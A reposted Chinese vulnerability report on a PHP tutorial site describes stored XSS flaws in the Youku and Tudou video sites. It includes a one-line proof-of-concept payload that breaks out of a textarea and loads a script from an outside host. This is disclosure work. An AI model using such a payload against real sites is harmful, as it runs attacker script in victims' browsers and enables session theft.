网站地图    收藏   

主页 > 后端 > 网站安全 >

优酷&土豆的XSS - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 优酷和土豆结合了,两者的漏洞也是如此的相似。夫唱妇随。详细说明:因为一些基本的安全常识不到位,导致了存储型xss。漏洞证明:测试代码:/textareascript src=http://tmxk.org/m/q.js/scr...

优酷和土豆结合了,两者的漏洞也是如此的相似。夫唱妇随。
详细说明:因为一些基本的安全常识不到位,导致了存储型xss。
漏洞证明:测试代码:
</textarea><script src=http://tmxk.org/m/q.js></script>
土豆没有做服务端过滤,导致了存储型XSS。
 
 
 
 
土豆播客因编辑器原因可插入代码:
 
 
 
标签处没做过滤,但服务端做了长度限制:
 
 
 
优酷有同样的毛病:
 
 



 
修复方案:

过滤啊。

作者 简阳_C段

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论